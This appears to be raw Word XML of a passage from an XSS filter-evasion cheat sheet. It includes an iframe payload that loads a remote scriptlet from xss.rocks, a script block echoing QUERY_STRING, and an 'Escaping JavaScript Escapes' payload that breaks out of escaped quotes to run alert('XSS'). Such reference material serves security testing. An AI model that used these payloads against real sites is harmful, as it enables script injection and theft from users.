                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3864"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3864"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3864"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3864"/>
                              <a:gd name="T18" fmla="+- 0 323 166"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3864"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3864"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5457 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3864"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5478 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3864"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5478 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3864"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5460 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3864"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5457 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3864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864" h="183">
                                <a:moveTo>
                                  <a:pt x="384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843" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3864" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3864" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3846" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="384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" name="Text Box 1242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386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&lt;iframe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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId22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http://xss.rocks/scriptlet.html</w:t>
                                </w:r>
                                <w:r>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Lucida Console"/>
                                    <w:color w:val="36454E"/>
                                    <w:spacing w:val="54"/>
                                    <w:w w:val="90"/>
                                    <w:sz w:val="15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1" o:spid="_x0000_s1194" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:193.2pt;height:9.15pt;z-index:-15700992;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="386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">
                <v:shape id="Freeform 1243" o:spid="_x0000_s1195" style="position:absolute;left:1614;top:165;width:3864;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="386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Mw8sMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/0PyxR6Ed0Yqmh0lbZS8OoTvA3ZMRub&#10;nU2yW43/vlso9DYf33MWq85W4katLx0rGA0TEMS50yUXCg77z8EUhA/IGivHpOBBHlbLp94CM+3u&#10;vKXbLhQihrDPUIEJoc6k9Lkhi37oauLIXVxrMUTYFlK3eI/htpJpkkykxZJjg8GaPgzlX7tvq6B5&#10;P/bP19PsOGnMmjBN1uPmtFfq5bl7m4MI1IV/8Z97o+P89HUEv9/EE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Mw8sMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m3843,182l21,182r-3,-1l,161r,-4l,21,21,,3843,r21,21l3864,161r-18,20l3843,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3843,348;21,348;18,347;0,327;0,323;0,187;21,166;3843,166;3864,187;3864,327;3846,347;3843,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1242" o:spid="_x0000_s1196" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:386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iNdcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y2hSI2uItKCUCjGePA4Zsdk&#10;MTsbs6um/74rFLzN433OfNnbRtyo88axgvEoAUFcOm24UrAvvt4+QPiArLFxTAp+ycNyMXiZY6bd&#10;nXO67UIlYgj7DBXUIbSZlL6syaIfuZY4cifXWQwRdpXUHd5juG1kmiQTadFwbKixpXVN5Xl3tQpW&#10;B84/zeXnuM1PuSmKacLfk7NSr8N+NQMRqA9P8b97o+P89D2Fxzfx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iNd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&lt;iframe</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId23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http://xss.rocks/scriptlet.html</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Lucida Console"/>
                              <w:color w:val="36454E"/>
                              <w:spacing w:val="54"/>
                              <w:w w:val="90"/>
                              <w:sz w:val="15"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> 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Escaping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Escapes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>
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5878195</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="671830" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1237" name="Group 1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830" cy="116205"/>
                          <a:chOff x="9257" y="6"/>
                          <a:chExt cx="1058" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1238" name="Freeform 1240"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="9256" y="6"/>
                            <a:ext cx="1058" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10293 9257"/>
                              <a:gd name="T1" fmla="*/ T0 w 1058"/>
                              <a:gd name="T2" fmla="+- 0 188 6"/>
                              <a:gd name="T3" fmla="*/ 188 h 183"/>
                              <a:gd name="T4" fmla="+- 0 9278 9257"/>
                              <a:gd name="T5" fmla="*/ T4 w 1058"/>
                              <a:gd name="T6" fmla="+- 0 188 6"/>
                              <a:gd name="T7" fmla="*/ 188 h 183"/>
                              <a:gd name="T8" fmla="+- 0 9275 9257"/>
                              <a:gd name="T9" fmla="*/ T8 w 1058"/>
                              <a:gd name="T10" fmla="+- 0 188 6"/>
                              <a:gd name="T11" fmla="*/ 188 h 183"/>
                              <a:gd name="T12" fmla="+- 0 9257 9257"/>
                              <a:gd name="T13" fmla="*/ T12 w 1058"/>
                              <a:gd name="T14" fmla="+- 0 167 6"/>
                              <a:gd name="T15" fmla="*/ 167 h 183"/>
                              <a:gd name="T16" fmla="+- 0 9257 9257"/>
                              <a:gd name="T17" fmla="*/ T16 w 1058"/>
                              <a:gd name="T18" fmla="+- 0 164 6"/>
                              <a:gd name="T19" fmla="*/ 164 h 183"/>
                              <a:gd name="T20" fmla="+- 0 9257 9257"/>
                              <a:gd name="T21" fmla="*/ T20 w 1058"/>
                              <a:gd name="T22" fmla="+- 0 27 6"/>
                              <a:gd name="T23" fmla="*/ 27 h 183"/>
                              <a:gd name="T24" fmla="+- 0 9278 9257"/>
                              <a:gd name="T25" fmla="*/ T24 w 1058"/>
                              <a:gd name="T26" fmla="+- 0 6 6"/>
                              <a:gd name="T27" fmla="*/ 6 h 183"/>
                              <a:gd name="T28" fmla="+- 0 10293 9257"/>
                              <a:gd name="T29" fmla="*/ T28 w 1058"/>
                              <a:gd name="T30" fmla="+- 0 6 6"/>
                              <a:gd name="T31" fmla="*/ 6 h 183"/>
                              <a:gd name="T32" fmla="+- 0 10314 9257"/>
                              <a:gd name="T33" fmla="*/ T32 w 1058"/>
                              <a:gd name="T34" fmla="+- 0 27 6"/>
                              <a:gd name="T35" fmla="*/ 27 h 183"/>
                              <a:gd name="T36" fmla="+- 0 10314 9257"/>
                              <a:gd name="T37" fmla="*/ T36 w 1058"/>
                              <a:gd name="T38" fmla="+- 0 167 6"/>
                              <a:gd name="T39" fmla="*/ 167 h 183"/>
                              <a:gd name="T40" fmla="+- 0 10296 9257"/>
                              <a:gd name="T41" fmla="*/ T40 w 1058"/>
                              <a:gd name="T42" fmla="+- 0 188 6"/>
                              <a:gd name="T43" fmla="*/ 188 h 183"/>
                              <a:gd name="T44" fmla="+- 0 10293 9257"/>
                              <a:gd name="T45" fmla="*/ T44 w 1058"/>
                              <a:gd name="T46" fmla="+- 0 188 6"/>
                              <a:gd name="T47" fmla="*/ 18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58" h="183">
                                <a:moveTo>
                                  <a:pt x="103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036" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1057" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1057" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1039" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="103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" name="Text Box 1239"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="9256" y="6"/>
                            <a:ext cx="105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41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&lt;SCRIPT&gt;var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8" o:spid="_x0000_s1197" style="position:absolute;left:0;text-align:left;margin-left:462.85pt;margin-top:.3pt;width:52.9pt;height:9.15pt;z-index:15759872;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="9257,6" coordsize="1058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">
                <v:shape id="Freeform 1240" o:spid="_x0000_s1198" style="position:absolute;left:9256;top:6;width:1058;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="105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rxkcYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBDF7wW/wzJCL0U3tSAluoqUSos3/0A9Dtkx&#10;G5KdTbOrSb+9cyh4m+G9ee83y/XgG3WjLlaBDbxOM1DERbAVlwZOx+3kHVRMyBabwGTgjyKsV6On&#10;JeY29Lyn2yGVSkI45mjApdTmWsfCkcc4DS2xaJfQeUyydqW2HfYS7hs9y7K59lixNDhs6cNRUR+u&#10;3sCP23xuX87DV11w/K1311O/17Uxz+NhswCVaEgP8//1txX82Zvgyjcygl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rxkcYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1036,182l21,182r-3,l,161r,-3l,21,21,,1036,r21,21l1057,161r-18,21l1036,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1036,188;21,188;18,188;0,167;0,164;0,27;21,6;1036,6;1057,27;1057,167;1039,188;1036,188" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1239" o:spid="_x0000_s1199" type="#_x0000_t202" style="position:absolute;left:9256;top:6;width:1058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psecMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TVUQrUaRRWFBWLbWwx5nm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCs75YbQA4QOyxtoxKXiQh+2m31tjqt2d&#10;M7qdQiliCPsUFVQhNKmUvqjIoh+7hjhyF9daDBG2pdQt3mO4reU0SebSouHYUGFDbxUV19OvVbD7&#10;4mxvfj6+P7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fzpb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pse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41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&lt;SCRIPT&gt;var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When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application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written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some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>inside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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like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following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="76" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="130" w:firstLine="2895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5811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52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1813560" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1234" name="Group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3560" cy="116205"/>
                          <a:chOff x="1614" y="82"/>
                          <a:chExt cx="2856" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1235" name="Freeform 1237"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="82"/>
                            <a:ext cx="2856" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4449 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2856"/>
                              <a:gd name="T2" fmla="+- 0 264 82"/>
                              <a:gd name="T3" fmla="*/ 264 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2856"/>
                              <a:gd name="T6" fmla="+- 0 264 82"/>
                              <a:gd name="T7" fmla="*/ 264 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2856"/>
                              <a:gd name="T10" fmla="+- 0 264 82"/>
                              <a:gd name="T11" fmla="*/ 264 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2856"/>
                              <a:gd name="T14" fmla="+- 0 243 82"/>
                              <a:gd name="T15" fmla="*/ 243 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2856"/>
                              <a:gd name="T18" fmla="+- 0 240 82"/>
                              <a:gd name="T19" fmla="*/ 240 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2856"/>
                              <a:gd name="T22" fmla="+- 0 103 82"/>
                              <a:gd name="T23" fmla="*/ 103 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2856"/>
                              <a:gd name="T26" fmla="+- 0 82 82"/>
                              <a:gd name="T27" fmla="*/ 82 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4449 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2856"/>
                              <a:gd name="T30" fmla="+- 0 82 82"/>
                              <a:gd name="T31" fmla="*/ 82 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4470 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2856"/>
                              <a:gd name="T34" fmla="+- 0 103 82"/>
                              <a:gd name="T35" fmla="*/ 103 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4470 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2856"/>
                              <a:gd name="T38" fmla="+- 0 243 82"/>
                              <a:gd name="T39" fmla="*/ 243 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4452 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2856"/>
                              <a:gd name="T42" fmla="+- 0 264 82"/>
                              <a:gd name="T43" fmla="*/ 264 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4449 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2856"/>
                              <a:gd name="T46" fmla="+- 0 264 82"/>
                              <a:gd name="T47" fmla="*/ 26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856" h="183">
                                <a:moveTo>
                                  <a:pt x="283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835" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2856" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2856" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2838" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="283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" name="Text Box 123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82"/>
                            <a:ext cx="285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a="$ENV{QUERY\_STRING}";&lt;/SCRIPT&gt;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5" o:spid="_x0000_s1200" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:4.1pt;width:142.8pt;height:9.15pt;z-index:-17658368;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,82" coordsize="285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">
                <v:shape id="Freeform 1237" o:spid="_x0000_s1201" style="position:absolute;left:1614;top:82;width:2856;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="285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v+i8UA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y1pFYmuoi3Sghiplp7H7JgE&#10;s7Mhu42pv94tCL3N433ObNGZSrTUuNKyguEgAkGcWV1yruDrsH6agHAeWWNlmRT8koPFvPcww0Tb&#10;C39Su/e5CCHsElRQeF8nUrqsIINuYGviwJ1sY9AH2ORSN3gJ4aaScRSNpcGSQ0OBNb0WlJ33P0bB&#10;MY3T9fb9+tZuv5ebl91ulVajTqnHfrecgvDU+X/x3f2hw/z4eQR/34QT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u/6LxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m2835,182l21,182r-3,l,161r,-3l,21,21,,2835,r21,21l2856,161r-18,21l2835,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2835,264;21,264;18,264;0,243;0,240;0,103;21,82;2835,82;2856,103;2856,243;2838,264;2835,264" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1236" o:spid="_x0000_s1202" type="#_x0000_t202" style="position:absolute;left:1614;top:82;width:285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X4C8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0VjdaCBrdiEgLhYI0xkOP0+wk&#10;WczOxuxW03/vFgRv83ifs1qPthNnGrxxrGA6SUAQV04bbhQcyveXOQgfkDV2jknBH3lY548PK8y0&#10;u3BB531oRAxhn6GCNoQ+k9JXLVn0E9cTR652g8UQ4dBIPeAlhttOzpIklRYNx4YWe9q2VB33v1bB&#10;5puLN3Pa/XwVdWHKcpHwZ3pU6vlp3CxBBBrDXXxzf+g4f/aawv838QS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+Av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a="$ENV{QUERY\_STRING}";&lt;/SCRIPT&gt;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and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want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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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own</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>escapes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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circumvent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escaping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>character.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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gets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>injected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read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="319" w:lineRule="auto"/>
        <w:ind w:left="154" w:firstLine="4075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5862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3810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2561590" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1231" name="Group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1590" cy="116205"/>
                          <a:chOff x="1614" y="6"/>
                          <a:chExt cx="4034" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1232" name="Freeform 1234"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="6"/>
                            <a:ext cx="4034" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5627 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4034"/>
                              <a:gd name="T2" fmla="+- 0 188 6"/>
                              <a:gd name="T3" fmla="*/ 188 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4034"/>
                              <a:gd name="T6" fmla="+- 0 188 6"/>
                              <a:gd name="T7" fmla="*/ 188 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4034"/>
                              <a:gd name="T10" fmla="+- 0 188 6"/>
                              <a:gd name="T11" fmla="*/ 188 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4034"/>
                              <a:gd name="T14" fmla="+- 0 167 6"/>
                              <a:gd name="T15" fmla="*/ 167 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4034"/>
                              <a:gd name="T18" fmla="+- 0 164 6"/>
                              <a:gd name="T19" fmla="*/ 164 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4034"/>
                              <a:gd name="T22" fmla="+- 0 27 6"/>
                              <a:gd name="T23" fmla="*/ 27 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4034"/>
                              <a:gd name="T26" fmla="+- 0 6 6"/>
                              <a:gd name="T27" fmla="*/ 6 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5627 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4034"/>
                              <a:gd name="T30" fmla="+- 0 6 6"/>
                              <a:gd name="T31" fmla="*/ 6 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5648 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4034"/>
                              <a:gd name="T34" fmla="+- 0 27 6"/>
                              <a:gd name="T35" fmla="*/ 27 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5648 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4034"/>
                              <a:gd name="T38" fmla="+- 0 167 6"/>
                              <a:gd name="T39" fmla="*/ 167 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5630 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4034"/>
                              <a:gd name="T42" fmla="+- 0 188 6"/>
                              <a:gd name="T43" fmla="*/ 188 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5627 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4034"/>
                              <a:gd name="T46" fmla="+- 0 188 6"/>
                              <a:gd name="T47" fmla="*/ 18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034" h="183">
                                <a:moveTo>
                                  <a:pt x="401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013" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4034" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4034" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4016" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401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" name="Text Box 123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6"/>
                            <a:ext cx="403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&lt;SCRIPT&gt;var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a="\\\\";alert('XSS');//";&lt;/SCRIPT&gt;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2" o:spid="_x0000_s1203" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:.3pt;width:201.7pt;height:9.15pt;z-index:-17657856;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,6" coordsize="403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">
                <v:shape id="Freeform 1234" o:spid="_x0000_s1204" style="position:absolute;left:1614;top:6;width:4034;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="403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CHz8EA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/6HZYTedGMKoUTXELSl6c3nfciOSTA7&#10;G7Nbk/77bkHobT6+56yz0bTiQb1rLCtYLiIQxKXVDVcKzqeP+RsI55E1tpZJwQ85yDbTyRpTbQc+&#10;0OPoKxFC2KWooPa+S6V0ZU0G3cJ2xIG72t6gD7CvpO5xCOGmlXEUJdJgw6Ghxo62NZW347dRsNud&#10;DxcyQ37ffxbWm/fkGn2hUi+zMV+B8DT6f/HTXegwP36N4e+bcIL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Qh8/BAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m4013,182l21,182r-3,l,161r,-3l,21,21,,4013,r21,21l4034,161r-18,21l4013,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4013,188;21,188;18,188;0,167;0,164;0,27;21,6;4013,6;4034,27;4034,167;4016,188;4013,188" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1233" o:spid="_x0000_s1205" type="#_x0000_t202" style="position:absolute;left:1614;top:6;width:403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Jbk8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPyxR6q5sqSJu6ERGFglCM8eBxmh2T&#10;JdnZmF01/vuuUOhtHu9z5ovBtuJKvTeOFbyNExDEpdOGKwWHYvP6DsIHZI2tY1JwJw+LbPQ0x1S7&#10;G+d03YdKxBD2KSqoQ+hSKX1Zk0U/dh1x5E6utxgi7Cupe7zFcNvKSZLMpEXDsaHGjlY1lc3+YhUs&#10;j5yvzfn7Z5efclMUHwlvZ41SL8/D8hNEoCH8i//cXzrOn0yn8Pgmn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iW5P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&lt;SCRIPT&gt;var</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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a="\\\\";alert('XSS');//";&lt;/SCRIPT&gt;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which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ends</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
